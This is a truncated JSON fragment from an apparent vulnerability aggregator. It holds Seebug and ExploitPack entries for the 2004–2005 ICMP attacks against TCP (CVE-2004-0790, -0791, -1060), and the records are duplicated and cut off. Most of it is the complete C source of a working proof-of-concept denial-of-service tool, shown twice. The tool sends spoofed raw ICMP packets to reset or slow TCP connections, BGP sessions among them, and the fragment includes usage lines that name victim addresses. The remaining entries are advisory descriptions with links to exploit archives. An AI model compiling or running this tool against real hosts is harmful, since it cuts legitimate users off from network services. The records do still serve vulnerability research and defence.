inet_ntoa(addr.sin_addr), iToPort);\r\n printf(&quot;[*] Count: %d\\n&quot;, dwCount);\r\n#endif\r\n\r\n#ifdef _WIN32\r\n if (WSAStartup(MAKEWORD(2,2), &amp;wsd) != 0) {\r\n printf(&quot;[-] WSAStartup() failed: %d\\n&quot;, GetLastError());\r\n return -1;\r\n }\r\n#endif\r\n /* Creating a raw socket */\r\n s = socket(AF_INET, SOCK_RAW, IPPROTO_UDP);\r\n#ifdef _WIN32\r\n if (s == INVALID_SOCKET) {\r\n#else\r\n if (s &lt; 0) {\r\n#endif\r\n printf(&quot;[-] socket() failed\\n&quot;);\r\n return -1;\r\n }\r\n\r\n /* Enable the IP header include option */\r\n#ifdef _WIN32\r\n bOpt = TRUE;\r\n#else\r\n bOpt = 1;\r\n#endif\r\n ret = setsockopt(s, IPPROTO_IP, IP_HDRINCL, (char *)&amp;bOpt, sizeof(bOpt));\r\n#ifdef _WIN32\r\n if (ret == SOCKET_ERROR) {\r\n printf(&quot;[-] setsockopt(IP_HDRINCL) failed: %d\\n&quot;, WSAGetLastError());\r\n return -1;\r\n }\r\n#endif\r\n\r\n /* Initalize the IP header */\r\n iTotalSize = sizeof(ipHdr) + sizeof(icmpHdr) + sizeof(msg)-1 + sizeof(ipHdrInc);\r\n\r\n iIPVersion = 4;\r\n iIPSize = sizeof(ipHdr) / sizeof(unsigned long);\r\n\r\n ipHdr.ip_verlen = (iIPVersion &lt;&lt; 4) | iIPSize;\r\n ipHdr.ip_tos = 0; /* IP type of service */\r\n /* Total packet len */\r\n ipHdr.ip_totallength = htons(iTotalSize);\r\n ipHdr.ip_id = htons(42451); /* Unique identifier */\r\n ipHdr.ip_offset = 0; /* Fragment offset field */\r\n ipHdr.ip_ttl = 255; /* Time to live */\r\n ipHdr.ip_protocol = 0x1; /* Protocol(ICMP) */\r\n ipHdr.ip_checksum = 0; /* IP checksum */\r\n ipHdr.ip_srcaddr = dwFromIP; /* Source address */\r\n ipHdr.ip_destaddr = dwToIP; /* Destination address */\r\n\r\n ipHdrInc.ip_verlen = (iIPVersion &lt;&lt; 4) | iIPSize;\r\n ipHdrInc.ip_tos = 0; /* IP type of service */\r\n /* Total packet len */\r\n ipHdrInc.ip_totallength = htons(sizeof(ipHdrInc)+20);\r\n ipHdrInc.ip_id = htons(25068); /* Unique identifier */\r\n\r\n ipHdrInc.ip_offset = 0; /* Fragment offset field */\r\n ipHdrInc.ip_ttl = 255; /* Time to live */\r\n ipHdrInc.ip_protocol = 0x6; /* Protocol(TCP) */\r\n ipHdrInc.ip_checksum = 0; /* IP checksum */\r\n ipHdrInc.ip_srcaddr = dwToIP; /* Source address */\r\n ipHdrInc.ip_destaddr = dwFromIP;/* Destination address */\r\n\r\n /* Initalize the ICMP header */\r\n icmpHdr.checksum = 0;\r\n if (Attack == 1) {\r\n icmpHdr.type = 3; /* Destination Unreachable Message */\r\n icmpHdr.code = 2; /* protocol unreachable */\r\n icmpHdr.unused = 0;\r\n } else if (Attack == 2) {\r\n icmpHdr.type = 3; /* Destination Unreachable Message */\r\n icmpHdr.code = 4; /* fragmentation needed and DF set */\r\n icmpHdr.unused = 0x44000000; /* next-hop MTU - 68 */\r\n } else {\r\n icmpHdr.type = 4; /* Source Quench Message */\r\n icmpHdr.code = 0;\r\n icmpHdr.unused = 0;\r\n }\r\n\r\n memset(buf, 0, MAX_PACKET);\r\n ptr = buf;\r\n\r\n memcpy(ptr, &amp;ipHdr, sizeof(ipHdr)); ptr += sizeof(ipHdr);\r\n memcpy(ptr, &amp;icmpHdr, sizeof(icmpHdr)); ptr += sizeof(icmpHdr);\r\n memcpy(ptr, &amp;ipHdrInc, sizeof(ipHdrInc)); ptr += sizeof(ipHdrInc);\r\n memcpy(ptr, msg, sizeof(msg)-1);\r\n iFromPort = htons(iFromPort);\r\n memcpy(ptr, &amp;iFromPort, 2);\r\n\r\n remote.sin_family = AF_INET;\r\n remote.sin_port = htons(iToPort);\r\n remote.sin_addr.s_addr = dwToIP;\r\n\r\n cksum = checksum((unsigned short *)&amp;ipHdrInc, 20);\r\n memcpy(buf+20+sizeof(icmpHdr)+10, &amp;cksum, 2);\r\n\r\n cksum = checksum((unsigned short *)&amp;ipHdr, 20);\r\n memcpy(buf+10, &amp;cksum, 2);\r\n\r\n for (p = iToPort; p &lt;= 65535; p++) {\r\n p2 = htons((short)p);\r\n memcpy((char *)(ptr+2), &amp;p2, 2);\r\n buf[22] = 0;\r\n buf[23] = 0;\r\n cksum = checksum((unsigned short *)(buf+20), sizeof(icmpHdr)+28);\r\n memcpy(buf+20+2, &amp;cksum, 2);\r\n\r\n for (i = 0; i &lt; dwCount; i++) {\r\n#ifdef _WIN32\r\n ret = sendto(s, buf, iTotalSize, 0, (SOCKADDR *)&amp;remote,\r\n sizeof(remote));\r\n#else\r\n ret = sendto(s, buf, iTotalSize, 0, (struct sockaddr *) &amp;remote,\r\n sizeof(remote));\r\n#endif\r\n#ifdef _WIN32\r\n if (ret == SOCKET_ERROR) {\r\n#else\r\n if (ret &lt; 0) {\r\n#endif\r\n printf(&quot;[-] sendto() failed\\n&quot;);\r\n break;\r\n }\r\n }\r\n }\r\n\r\n#ifdef _WIN32\r\n closesocket(s);\r\n WSACleanup();\r\n#endif\r\n\r\n return 0;\r\n}\r\n\r\n// milw0rm.com [2005-04-20]\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-15543", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-11-19T16:39:51", "description": "No description provided by source.", "cvss3": {}, "published": "2014-07-01T00:00:00", "title": "Multiple Vendor ICMP Message Handling DoS", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2004-0790", "CVE-2004-0791", "CVE-2004-1060"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-79052", "id": "SSV:79052", "sourceData": "\n source: http://www.securityfocus.com/bid/13124/info\r\n \r\nMultiple vendor implementations of TCP/IP Internet Control Message Protocol (ICMP) are reported prone to several denial-of-service attacks.\r\n \r\nICMP is employed by network nodes to determine certain automatic actions to take based on network failures reported by an ICMP message.\r\n \r\nReportedly, the RFC doesn&#39;t recommend security checks for ICMP error messages. As long as an ICMP message contains a valid source and destination IP address and port pair, it will be accepted for an associated connection.\r\n \r\nThe following individual attacks are reported:\r\n \r\n- A blind connection-reset attack. This attack takes advantage of the specification that describes that on receiving a &#39;hard&#39; ICMP error, the corresponding connection should be aborted. The Mitre ID CAN-2004-0790 is assigned to this issue.\r\n \r\nA remote attacker may exploit this issue to terminate target TCP connections and deny service for legitimate users.\r\n \r\n- An ICMP Source Quench attack. This attack takes advantage of the specification that a host must react to receive ICMP Source Quench messages by slowing transmission on the associated connection. The Mitre ID CAN-2004-0791 is assigned to this issue.\r\n \r\nA remote attacker may exploit this issue to degrade the performance of TCP connections and partially deny service for legitimate users.\r\n \r\n- An attack against ICMP PMTUD is reported to affect multiple vendors when they are configured to employ PMTUD. By sending a suitable forged ICMP message to a target host, an attacker may reduce the MTU for a given connection. The Mitre ID CAN-2004-1060 is assigned to this issue.\r\n \r\nA remote attacker may exploit this issue to degrade the performance of TCP connections and partially deny service for legitimate users.\r\n \r\n**Update: Microsoft platforms are also reported prone to these issues.\r\n \r\nhttp://www.exploit-db.com/sploits/25389.tar.gz\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-79052", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-11-19T14:57:41", "description": "No description provided by source.", "cvss3": {}, "published": "2014-07-01T00:00:00", "title": "Multiple OS (Win32/Aix/Cisco) - Crafted ICMP Messages DoS Exploit", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2004-0790", "CVE-2004-0791", "CVE-2004-1060"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-63076", "id": "SSV:63076", "sourceData": "\n /* HOD-icmp-attacks-poc.c: 2005-04-15: PUBLIC v.0.2\r\n*\r\n* Copyright (c) 2004-2005 houseofdabus.\r\n*\r\n* (MS05-019) (CISCO:20050412)\r\n* ICMP attacks against TCP (Proof-of-Concept)\r\n*\r\n*\r\n*\r\n* .::[ houseofdabus ]::.\r\n*\r\n*\r\n*\r\n* [ for more details:\r\n* [ http://www.livejournal.com/users/houseofdabus\r\n* ---------------------------------------------------------------------\r\n* Systems Affected:\r\n* - Cisco Content Services Switch 11000 Series (WebNS)\r\n* - Cisco Global Site Selector (GSS) 4480 1.x\r\n* - Cisco IOS 10.x\r\n* - Cisco IOS 11.x\r\n* - Cisco IOS 12.x\r\n* - Cisco IOS R11.x\r\n* - Cisco IOS R12.x\r\n* - Cisco IOS XR (CRS-1) 3.x\r\n* - Cisco ONS 15000 Series\r\n* - Cisco PIX 6.x\r\n* - Cisco SAN-OS 1.x (MDS 9000 Switches)\r\n* - AIX 5.x\r\n* - Windows Server 2003\r\n* - Windows XP SP2\r\n* - Windows XP SP1\r\n* - Windows 2000 SP4\r\n* - Windows 2000 SP3\r\n* ...\r\n*\r\n* ---------------------------------------------------------------------\r\n* Description:\r\n* A denial of service vulnerability exists that could allow an\r\n* attacker to send a specially crafted Internet Control Message\r\n* Protocol (ICMP) message to an affected system. An attacker who\r\n* successfully exploited this vulnerability could cause the affected\r\n* system to reset existing TCP connections, reduce the throughput\r\n* in existing TCP connections, or consume large amounts of CPU and\r\n* memory resources.\r\n* (CAN-2004-0790, CAN-2004-0791, CAN-2004-1060)\r\n*\r\n* ---------------------------------------------------------------------\r\n* Solution:\r\n* http://www.microsoft.com/technet/security/Bulletin/MS05-019.mspx\r\n* http://www.cisco.com/warp/public/707/cisco-sa-20050412-icmp.shtml\r\n*\r\n* Other References:\r\n* http://www.gont.com.ar/drafts/icmp-attacks-against-tcp.html\r\n* http://www.kb.cert.org/vuls/id/222750\r\n*\r\n* ---------------------------------------------------------------------\r\n* Tested on:\r\n* - Windows Server 2003\r\n* - Windows XP SP1\r\n* - Windows 2000 SP4\r\n* - Cisco IOS 11.x\r\n*\r\n* ---------------------------------------------------------------------\r\n* Compile:\r\n*\r\n* Win32/VC++ : cl -o HOD-icmp-attacks-poc HOD-icmp-attacks-poc.c\r\n* Win32/cygwin: gcc -o HOD-icmp-attacks-poc HOD-icmp-attacks-poc.c\r\n* Linux : gcc -o HOD-icmp-attacks-poc HOD-icmp-attacks-poc.c\r\n*\r\n* ---------------------------------------------------------------------\r\n* Examples:\r\n*\r\n* client &#60;---&#62; router &#60;---&#62; router &#60;---&#62; server\r\n*\r\n* CLIENT &#60;---&#62; SERVER\r\n*\r\n* HOD-icmp.exe -fi:serverIP -ti:clientIP -fp:80 -tp:1023 -a:1\r\n* (abort the connection)\r\n*\r\n* HOD-icmp.exe -fi:serverIP -ti:clientIP -fp:80 -tp:1023 -a:2\r\n* (slow down the transmission rate for traffic)\r\n*\r\n*\r\n* ROUTER1 &#60;---&#62; ROUTER2\r\n*\r\n* HOD-icmp.exe -fi:routerIP2 -ti:routerIP1 -fp:179 -a:1\r\n* (DoS Cisco BGP Connections)\r\n*\r\n* HOD-icmp.exe -fi:routerIP2 -ti:routerIP1 -fp:80 -a:2\r\n* (slow down the transmission rate for traffic)\r\n*\r\n* ---------------------------------------------------------------------\r\n*\r\n* This is provided as proof-of-concept code only for educational\r\n* purposes and testing by authorized individuals with permission\r\n* to do so.\r\n*\r\n*/\r\n\r\n/* #define _WIN32 */\r\n\r\n#ifdef _WIN32\r\n#pragma comment(lib,&#34;ws2_32&#34;)\r\n#pragma pack(1)\r\n#define WIN32_LEAN_AND_MEAN\r\n#include &#60;winsock2.h&#62;\r\n/* IP_HDRINCL */\r\n#include &#60;ws2tcpip.h&#62;\r\n\r\n#else\r\n#include &#60;sys/types.h&#62;\r\n#include &#60;netinet/in.h&#62;\r\n#include &#60;sys/socket.h&#62;\r\n#include &#60;stdio.h&#62;\r\n#include &#60;stdlib.h&#62;\r\n#include &#60;arpa/inet.h&#62;\r\n#include &#60;netdb.h&#62;\r\n#include &#60;sys/timeb.h&#62;\r\n#endif\r\n\r\n#include &#60;string.h&#62;\r\n#include &#60;stdio.h&#62;\r\n#include &#60;stdlib.h&#62;\r\n\r\n#define MAX_PACKET 4096\r\n\r\n#define DEFAULT_PORT 80\r\n#define DEFAULT_IP &#34;192.168.0.1&#34;\r\n#define DEFAULT_COUNT 1\r\n\r\n/* Define the IP header */\r\ntypedef struct ip_hdr {\r\n unsigned char ip_verlen; /* IP version & length */\r\n unsigned char ip_tos; /* IP type of service */\r\n unsigned short ip_totallength; /* Total length */\r\n unsigned short ip_id; /* Unique identifier */\r\n unsigned short ip_offset; /* Fragment offset field */\r\n unsigned char ip_ttl; /* Time to live */\r\n unsigned char ip_protocol; /* Protocol */\r\n unsigned short ip_checksum; /* IP checksum */\r\n unsigned int ip_srcaddr; /* Source address */\r\n unsigned int ip_destaddr; /* Destination address */\r\n} IP_HDR, *PIP_HDR;\r\n\r\n/* Define the ICMP header */\r\n/* Destination Unreachable Message */\r\ntypedef struct icmp_hdr {\r\n unsigned char type; /* Type */\r\n unsigned char code; /* Code */\r\n unsigned short checksum; /* Checksum */\r\n unsigned long unused; /* Unused */\r\n} ICMP_HDR, *PICMP_HDR;\r\n\r\n/* 64 bits of Original Data Datagram (TCP header) */\r\nchar msg[] =\r\n&#34;\\x00\\x50&#34; /* Source port */\r\n&#34;\\x00\\x50&#34; /* Destination port */\r\n&#34;\\x23\\x48\\x4f\\x44&#34;;\r\n\r\n/* globals */\r\nunsigned long dwToIP, /* IP to send to */\r\n dwFromIP; /* IP to send from (spoof) */\r\nunsigned short iToPort, /* Port to send to */\r\n iFromPort; /* Port to send from (spoof) */\r\nunsigned long dwCount; /* Number of times to send */\r\nunsigned long Attack;\r\n\r\nvoid\r\nusage(char *progname) {\r\n printf(&#34;Usage:\\n\\n&#34;);\r\n printf(&#34;%s &#60;-fi:SRC-IP&#62; &#60;-ti:VICTIM-IP&#62; &#60;-fi:SRC-PORT&#62; [-tp:int] [-a:int] [-n:int]\\n\\n&#34;, progname);\r\n printf(&#34; -fi:IP From (sender) IP address\\n&#34;);\r\n printf(&#34; -ti:IP To (target) IP address\\n&#34;);\r\n printf(&#34; -fp:int Target open TCP port number\\n&#34;);\r\n printf(&#34; (for example - 21, 25, 80)\\n&#34;);\r\n printf(&#34; -tp:int Inicial value for bruteforce (sender) TCP port number\\n&#34;);\r\n printf(&#34; (default: 0 = range of ports 0-65535)\\n&#34;);\r\n printf(&#34; -n:int Number of packets\\n\\n&#34;);\r\n printf(&#34; -a:int ICMP attacks:\\n&#34;);\r\n printf(&#34; 1 - Blind connection-reset attack\\n&#34;);\r\n printf(&#34; (ICMP protocol unreachable)\\n&#34;);\r\n printf(&#34; 2 - Path MTU discovery attack\\n&#34;);\r\n printf(&#34; (slow down the transmission rate)\\n&#34;);\r\n printf(&#34; 3 - ICMP Source Quench attack\\n&#34;);\r\n exit(1);\r\n}\r\n\r\nvoid\r\nValidateArgs(int argc, char **argv)\r\n{\r\n int i;\r\n\r\n iToPort = 0;\r\n iFromPort = DEFAULT_PORT;\r\n dwToIP = inet_addr(DEFAULT_IP);\r\n dwFromIP = inet_addr(DEFAULT_IP);\r\n dwCount = DEFAULT_COUNT;\r\n Attack = 1;\r\n\r\n for (i = 1; i &#60; argc; i++) {\r\n if ((argv[i][0] == &#39;-&#39;) || (argv[i][0] == &#39;/&#39;)) {\r\n switch (tolower(argv[i][1])) {\r\n case &#39;f&#39;:\r\n switch (tolower(argv[i][2])) {\r\n case &#39;p&#39;:\r\n if (strlen(argv[i]) &#62; 4)\r\n iFromPort = atoi(&argv[i][4]);\r\n break;\r\n case &#39;i&#39;:\r\n if (strlen(argv[i]) &#62; 4)\r\n dwFromIP = inet_addr(&argv[i][4]);\r\n break;\r\n default:\r\n usage(argv[0]);\r\n break;\r\n }\r\n break;\r\n case &#39;t&#39;:\r\n switch (tolower(argv[i][2])) {\r\n case &#39;p&#39;:\r\n if (strlen(argv[i]) &#62; 4)\r\n iToPort = atoi(&argv[i][4]);\r\n break;\r\n case &#39;i&#39;:\r\n if (strlen(argv[i]) &#62; 4)\r\n dwToIP = inet_addr(&argv[i][4]);\r\n break;\r\n default:\r\n usage(argv[0]);\r\n break;\r\n }\r\n break;\r\n case &#39;n&#39;:\r\n if (strlen(argv[i]) &#62; 3)\r\n dwCount = atol(&argv[i][3]);\r\n break;\r\n case &#39;a&#39;:\r\n if (strlen(argv[i]) &#62; 3)\r\n Attack = atol(&argv[i][3]);\r\n if ((Attack &#62; 3) || (Attack &#60; 1))\r\n usage(argv[0]);\r\n break;\r\n default:\r\n usage(argv[0]);\r\n break;\r\n }\r\n }\r\n }\r\n return;\r\n}\r\n\r\n/* This function calculates the 16-bit one&#39;s complement sum */\r\n/* for the supplied buffer */\r\nunsigned short\r\nchecksum(unsigned short *buffer, int size)\r\n{\r\n unsigned long cksum = 0;\r\n\r\n while (size &#62; 1) {\r\n cksum += *buffer++;\r\n size -= sizeof(unsigned short);\r\n }\r\n if (size) {\r\n cksum += *(unsigned char *)buffer;\r\n }\r\n cksum = (cksum &#62;&#62; 16) + (cksum & 0xffff);\r\n cksum += (cksum &#62;&#62;16);\r\n\r\n return (unsigned short)(~cksum);\r\n}\r\n\r\nint\r\nmain(int argc, char **argv)\r\n{\r\n\r\n#ifdef _WIN32\r\n WSADATA wsd;\r\n#endif\r\n int s;\r\n#ifdef _WIN32\r\n BOOL bOpt;\r\n#else\r\n int bOpt;\r\n#endif\r\n struct sockaddr_in remote;\r\n IP_HDR ipHdr,\r\n ipHdrInc;\r\n ICMP_HDR icmpHdr;\r\n int ret;\r\n unsigned long i, p;\r\n unsigned short iTotalSize,\r\n iIPVersion,\r\n iIPSize,\r\n p2,\r\n cksum = 0;\r\n char buf[MAX_PACKET],\r\n *ptr = NULL;\r\n#ifdef _WIN32\r\n IN_ADDR addr;\r\n#else\r\n struct sockaddr_in addr;\r\n#endif\r\n\r\n printf(&#34;\\n (MS05-019) (CISCO:20050412)\\n&#34;);\r\n printf(&#34; ICMP attacks against TCP (Proof-of-Concept)\\n\\n&#34;);\r\n printf(&#34; Copyright (c) 2004-2005 .: houseofdabus :.\\n\\n\\n&#34;);\r\n\r\n if (argc &#60; 3) usage(argv[0]);\r\n\r\n /* Parse command line arguments and print them out */\r\n ValidateArgs(argc, argv);\r\n#ifdef _WIN32\r\n addr.S_un.S_addr = dwFromIP;\r\n printf(&#34;[*] From IP: &#60;%s&#62;, port: %d\\n&#34;, inet_ntoa(addr), iFromPort);\r\n addr.S_un.S_addr = dwToIP;\r\n printf(&#34;[*] To IP: &#60;%s&#62;, port: %d\\n&#34;, inet_ntoa(addr), iToPort);\r\n printf(&#34;[*] Count: %d\\n&#34;, dwCount);\r\n#else\r\n addr.sin_addr.s_addr = dwFromIP;\r\n printf(&#34;[*] From IP: &#60;%s&#62;, port: %d\\n&#34;, inet_ntoa(addr.sin_addr), iFromPort);\r\n addr.sin_addr.s_addr = dwToIP;\r\n printf(&#34;[*] To IP: &#60;%s&#62;, port: %d\\n&#34;, inet_ntoa(addr.sin_addr), iToPort);\r\n printf(&#34;[*] Count: %d\\n&#34;, dwCount);\r\n#endif\r\n\r\n#ifdef _WIN32\r\n if (WSAStartup(MAKEWORD(2,2), &wsd) != 0) {\r\n printf(&#34;[-] WSAStartup() failed: %d\\n&#34;, GetLastError());\r\n return -1;\r\n }\r\n#endif\r\n /* Creating a raw socket */\r\n s = socket(AF_INET, SOCK_RAW, IPPROTO_UDP);\r\n#ifdef _WIN32\r\n if (s == INVALID_SOCKET) {\r\n#else\r\n if (s &#60; 0) {\r\n#endif\r\n printf(&#34;[-] socket() failed\\n&#34;);\r\n return -1;\r\n }\r\n\r\n /* Enable the IP header include option */\r\n#ifdef _WIN32\r\n bOpt = TRUE;\r\n#else\r\n bOpt = 1;\r\n#endif\r\n ret = setsockopt(s, IPPROTO_IP, IP_HDRINCL, (char *)&bOpt, sizeof(bOpt));\r\n#ifdef _WIN32\r\n if (ret == SOCKET_ERROR) {\r\n printf(&#34;[-] setsockopt(IP_HDRINCL) failed: %d\\n&#34;, WSAGetLastError());\r\n return -1;\r\n }\r\n#endif\r\n\r\n /* Initalize the IP header */\r\n iTotalSize = sizeof(ipHdr) + sizeof(icmpHdr) + sizeof(msg)-1 + sizeof(ipHdrInc);\r\n\r\n iIPVersion = 4;\r\n iIPSize = sizeof(ipHdr) / sizeof(unsigned long);\r\n\r\n ipHdr.ip_verlen = (iIPVersion &#60;&#60; 4) | iIPSize;\r\n ipHdr.ip_tos = 0; /* IP type of service */\r\n /* Total packet len */\r\n ipHdr.ip_totallength = htons(iTotalSize);\r\n ipHdr.ip_id = htons(42451); /* Unique identifier */\r\n ipHdr.ip_offset = 0; /* Fragment offset field */\r\n ipHdr.ip_ttl = 255; /* Time to live */\r\n ipHdr.ip_protocol = 0x1; /* Protocol(ICMP) */\r\n ipHdr.ip_checksum = 0; /* IP checksum */\r\n ipHdr.ip_srcaddr = dwFromIP; /* Source address */\r\n ipHdr.ip_destaddr = dwToIP; /* Destination address */\r\n\r\n ipHdrInc.ip_verlen = (iIPVersion &#60;&#60; 4) | iIPSize;\r\n ipHdrInc.ip_tos = 0; /* IP type of service */\r\n /* Total packet len */\r\n ipHdrInc.ip_totallength = htons(sizeof(ipHdrInc)+20);\r\n ipHdrInc.ip_id = htons(25068); /* Unique identifier */\r\n\r\n ipHdrInc.ip_offset = 0; /* Fragment offset field */\r\n ipHdrInc.ip_ttl = 255; /* Time to live */\r\n ipHdrInc.ip_protocol = 0x6; /* Protocol(TCP) */\r\n ipHdrInc.ip_checksum = 0; /* IP checksum */\r\n ipHdrInc.ip_srcaddr = dwToIP; /* Source address */\r\n ipHdrInc.ip_destaddr = dwFromIP;/* Destination address */\r\n\r\n /* Initalize the ICMP header */\r\n icmpHdr.checksum = 0;\r\n if (Attack == 1) {\r\n icmpHdr.type = 3; /* Destination Unreachable Message */\r\n icmpHdr.code = 2; /* protocol unreachable */\r\n icmpHdr.unused = 0;\r\n } else if (Attack == 2) {\r\n icmpHdr.type = 3; /* Destination Unreachable Message */\r\n icmpHdr.code = 4; /* fragmentation needed and DF set */\r\n icmpHdr.unused = 0x44000000; /* next-hop MTU - 68 */\r\n } else {\r\n icmpHdr.type = 4; /* Source Quench Message */\r\n icmpHdr.code = 0;\r\n icmpHdr.unused = 0;\r\n }\r\n\r\n memset(buf, 0, MAX_PACKET);\r\n ptr = buf;\r\n\r\n memcpy(ptr, &ipHdr, sizeof(ipHdr)); ptr += sizeof(ipHdr);\r\n memcpy(ptr, &icmpHdr, sizeof(icmpHdr)); ptr += sizeof(icmpHdr);\r\n memcpy(ptr, &ipHdrInc, sizeof(ipHdrInc)); ptr += sizeof(ipHdrInc);\r\n memcpy(ptr, msg, sizeof(msg)-1);\r\n iFromPort = htons(iFromPort);\r\n memcpy(ptr, &iFromPort, 2);\r\n\r\n remote.sin_family = AF_INET;\r\n remote.sin_port = htons(iToPort);\r\n remote.sin_addr.s_addr = dwToIP;\r\n\r\n cksum = checksum((unsigned short *)&ipHdrInc, 20);\r\n memcpy(buf+20+sizeof(icmpHdr)+10, &cksum, 2);\r\n\r\n cksum = checksum((unsigned short *)&ipHdr, 20);\r\n memcpy(buf+10, &cksum, 2);\r\n\r\n for (p = iToPort; p &#60;= 65535; p++) {\r\n p2 = htons((short)p);\r\n memcpy((char *)(ptr+2), &p2, 2);\r\n buf[22] = 0;\r\n buf[23] = 0;\r\n cksum = checksum((unsigned short *)(buf+20), sizeof(icmpHdr)+28);\r\n memcpy(buf+20+2, &cksum, 2);\r\n\r\n for (i = 0; i &#60; dwCount; i++) {\r\n#ifdef _WIN32\r\n ret = sendto(s, buf, iTotalSize, 0, (SOCKADDR *)&remote,\r\n sizeof(remote));\r\n#else\r\n ret = sendto(s, buf, iTotalSize, 0, (struct sockaddr *) &remote,\r\n sizeof(remote));\r\n#endif\r\n#ifdef _WIN32\r\n if (ret == SOCKET_ERROR) {\r\n#else\r\n if (ret &#60; 0) {\r\n#endif\r\n printf(&#34;[-] sendto() failed\\n&#34;);\r\n break;\r\n }\r\n }\r\n }\r\n\r\n#ifdef _WIN32\r\n closesocket(s);\r\n WSACleanup();\r\n#endif\r\n\r\n return 0;\r\n}\r\n\r\n// milw0rm.com [2005-04-20]\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-63076", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-11-19T16:38:01", "description": "No description provided by source.", "cvss3": {}, "published": "2014-07-01T00:00:00", "title": "Multiple Vendor ICMP Implementation Spoofed Source Quench Packet DoS", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2004-0790", "CVE-2004-0791", "CVE-2004-1060"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-79050", "id": "SSV:79050", "sourceData": "\n source: http://www.securityfocus.com/bid/13124/info\r\n\r\nMultiple vendor implementations of TCP/IP Internet Control Message Protocol (ICMP) are reported prone to several denial-of-service attacks.\r\n\r\nICMP is employed by network nodes to determine certain automatic actions to take based on network failures reported by an ICMP message.\r\n\r\nReportedly, the RFC doesn&#39;t recommend security checks for ICMP error messages. As long as an ICMP message contains a valid source and destination IP address and port pair, it will be accepted for an associated connection.\r\n\r\nThe following individual attacks are reported:\r\n\r\n- A blind connection-reset attack. This attack takes advantage of the specification that describes that on receiving a &#39;hard&#39; ICMP error, the corresponding connection should be aborted. The Mitre ID CAN-2004-0790 is assigned to this issue.\r\n\r\nA remote attacker may exploit this issue to terminate target TCP connections and deny service for legitimate users.\r\n\r\n- An ICMP Source Quench attack. This attack takes advantage of the specification that a host must react to receive ICMP Source Quench messages by slowing transmission on the associated connection. The Mitre ID CAN-2004-0791 is assigned to this issue.\r\n\r\nA remote attacker may exploit this issue to degrade the performance of TCP connections and partially deny service for legitimate users.\r\n\r\n- An attack against ICMP PMTUD is reported to affect multiple vendors when they are configured to employ PMTUD. By sending a suitable forged ICMP message to a target host, an attacker may reduce the MTU for a given connection. The Mitre ID CAN-2004-1060 is assigned to this issue.\r\n\r\nA remote attacker may exploit this issue to degrade the performance of TCP connections and partially deny service for legitimate users.\r\n\r\n**Update: Microsoft platforms are also reported prone to these issues. \r\n\r\nhttp://www.exploit-db.com/sploits/25387.tar.gz\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-79050", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:35", "description": "\nMultiple Vendor ICMP Message Handling - Denial of Service", "edition": 2, "cvss3": {}, "published": "2005-04-12T00:00:00", "title": "Multiple Vendor ICMP Message Handling - Denial of Service", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2004-0791", "CVE-2004-0790", "CVE-2004-1060"], "modified": "2005-04-12T00:00:00", "id": "EXPLOITPACK:F18E26220A1C51AD7CB98D811BBAA0E4", "href": "", "sourceData": "source: https://www.securityfocus.com/bid/13124/info\n \nMultiple vendor implementations of TCP/IP Internet Control Message Protocol (ICMP) are reported prone to several denial-of-service attacks.\n \nICMP is employed by network nodes to determine certain automatic actions to take based on network failures reported by an ICMP message.\n \nReportedly, the RFC doesn't recommend security checks for ICMP error messages. As long as an ICMP message contains a valid source and destination IP address and port pair, it will be accepted for an associated connection.\n \nThe following individual attacks are reported:\n \n- A blind connection-reset attack. This attack takes advantage of the specification that describes that on receiving a 'hard' ICMP error, the corresponding connection should be aborted. The Mitre ID CAN-2004-0790 is assigned to this issue.\n \nA remote attacker may exploit this issue to terminate target TCP connections and deny service for legitimate users.\n \n- An ICMP Source Quench attack. This attack takes advantage of the specification that a host must react to receive ICMP Source Quench messages by slowing transmission on the associated connection. The Mitre ID CAN-2004-0791 is assigned to this issue.\n \nA remote attacker may exploit this issue to degrade the performance of TCP connections and partially deny service for legitimate users.\n \n- An attack against ICMP PMTUD is reported to affect multiple vendors when they are configured to employ PMTUD. By sending a suitable forged ICMP message to a target host, an attacker may reduce the MTU for a given connection. The Mitre ID CAN-2004-1060 is assigned to this issue.\n \nA remote attacker may exploit this issue to degrade the performance of TCP connections and partially deny service for legitimate users.\n \n**Update: Microsoft platforms are also reported prone to these issues.\n \nhttps://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25389.tar.gz", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-04-01T19:04:35", "description": "\nMultiple OS (Win32AixCisco) - Crafted ICMP Messages Denial of Service (MS05-019)", "edition": 2, "cvss3": {}, "published": "2005-04-20T00:00:00", "title": "Multiple OS (Win32AixCisco) - Crafted ICMP Messages Denial of Service (MS05-019)", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 